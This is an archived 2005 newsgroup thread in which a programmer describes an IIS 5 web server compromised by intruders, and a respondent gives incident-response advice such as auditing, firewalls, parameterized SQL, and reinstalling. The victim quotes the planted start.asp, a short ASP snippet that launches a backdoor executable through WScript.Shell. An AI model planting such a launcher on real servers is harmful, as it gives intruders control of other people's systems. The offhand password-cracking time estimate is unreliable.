Re: IIS 5 Compromisation

From: Jeff Cochran (jeff.nospam_at_zina.com)
Date: 04/08/05 

Date: Fri, 08 Apr 2005 19:43:29 GMT

On Thu, 7 Apr 2005 11:36:15 +1000, "Saturday Night Paulsy"
<pkorosi@redpepper.com.au> wrote:

>ha ha - nice one Jeff,
>
>I might be dumb but I aint that stupit. I admit I am no security
>specialist - I'm a programmer. I thought someone here
>might be able to shed some light, judging by the responses to the questions
>in this group, some of which quite frankly
>don't even belong in this group.
>
>As for your suggestions, administrator only ftp access, 13 character strong
>password - it would even take YOU a
>century to work it out.

A 13 character string, assuming you didn't use high-ASCII characters
since they're awfully hard to type in a password, is about 22 minutes
to crack. Less if I can use an exploit to get the SAM database on an
unpatched system. Is FTP set to lock out the user after x number of
failed attempts?

>All database submissions/request are filtered
>against SQL injection attacks using regex. I simply
>can't see any way in via that side.

It's the ways you can't see that come back to bite you. Are you using
a standard port for SQL? Is *every* query parameterized ans using
stored procedures?

>Anyways - it turns out its the Win32.IRCFlood trojan, and appears to be
>fairly new as the only patch available to deal with it
>is dated yesterday.

The Win32.IRCFlood!Trojan is several years old, and the major AV
vendors have detected it for quite a while. This may be a newer
variant, but even those should be detected. The older version used
IRC ports for control, which would normally be blocked by a firewall
on a system that didn't have IRC clients/servers running.

The major problem you have now though is that this trojan allows
control of the system through a backdoor it installs. You may have
found and removed the trojan, but do you know what other changes have
been made to the system? Possibly none, but you don't have the
logging in place to do the forensics to be sure.

The advice still stands. Flatten the box and reinstall.

>And, as my MSCE friend has just told me (after some
>research), firewalls won't necessarily stop it from getting on
>the box - only stop the gigs of *** from getting put on.
>
>For anyone that might be interested, it was probably downloaded by someone
>doing "legit" work on the box by browsing. thats what
>the msce told me, anyways - and he's a good deal brighter than your average
>minesweeper certified solitaire expert.

The trojan in question is normally delivered via an executable, which
when run installs the trojan and opens the backdoors. I haven't seen
any newer attack vectors for it, but then I haven't looked either. A
new variant may have a new vector. Or something else you haven't
detected may be on the box as well.

>Finally, thanks for your help. Next time I reckon I'll just fart 'cause
>it'll save all this typing time. I could've been drinking coffee instead.

Next time, go ahead and fart *and* save the typing time. But install
and correctly configure a firewall. Configure auditing. Install and
use the latest version of your AV software. Security isn't a singular
event, it's an ongoing process. Fortunately, you can still drink your
coffee while monitoring it.

Jeff

>"Jeff Cochran" <jeff.nospam@zina.com> wrote in message
>news:42616af5.1154390806@msnews.microsoft.com...
>> On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
>> <pkorosi@redpepper.com.au> wrote:
>>
>> >Hi all,
>> >
>> >my company has several servers acting as web servers hosted at an ISP and
>> >one of them was compromised by some warez bunnies.
>> >All the server have the latest patches and anti virus software running,
>but
>> >no firewall...
>> >
>> >Several files appeared in a folder off one of the webs, being
>> >
>> >kill.exe
>> >shellconfig.ocx
>> >shellsuccesslog.ocx
>> >win.asp
>> >start.asp
>> >shellhost32.exe
>> >
>> >
>> >win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
>> >start.asp reads as follows
>> >
>> ><%
>> >CreateObject("WScript.Shell").Run("shellhost32.exe")
>> >%>
>> ><h1>Yes, you made it!! Good job dude!<\h1>
>> >
>> >
>> >My question is, has anyone encountered this and how do they get the files
>> >there. Two questions, really.
>>
>> To find out how they got there, check your audit logs and firewall
>> logs. Oh yeah, you already figured out that they got there because
>> you weren't secured and had no firewall. Likely you weren't auditing
>> either. Possibly hadn't turned off anonymous file upload in FTP.
>> Possibly your host got hacked. Possibly a SQL attack. Possibly using
>> "password" as a password wasn't that smart. Too many possiblys for
>> anyone to tell you for sure.
>>
>> >Any help would be greatly appreciated, as they uploaded a significant
>amount
>> >of german dvd's and other garbage onto the server at our expense.
>>
>> Bummer. Flatten the box, resinstall from scratch, patch, secure and
>> get that firewall installed. Live and learn.
>>
>> Jeff
>